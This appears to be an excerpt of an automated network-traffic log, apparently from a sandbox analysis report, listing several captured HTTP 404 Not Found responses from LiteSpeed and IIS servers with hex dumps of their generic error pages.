e6sH8=MMfsStaAwy1DiXTSkGSV3ugOr/poGLCoyvuVSqHUH5KnRY4J9vc5C0ggo4PwXXx/Q//A76HBMfVhGpE0DCt15VIIsHY8/QSw+JMRZ0xcOCVcmpcr9k9CDUEfcoa9lYWPxXjQz61dTiWsiW/1JtHsrdsDqVBdwKmDXqsfGaZeqBZPvAkYkcX9MFiZHoQFAU4McqmSkpo=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 00:21:36 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sat, 11 Jan 2025 00:21:51 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sat, 11 Jan 2025 00:21:54 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sat, 11 Jan 2025 00:21:56 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sat, 11 Jan 2025 00:21:58 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 00:22:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 00:22:08 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 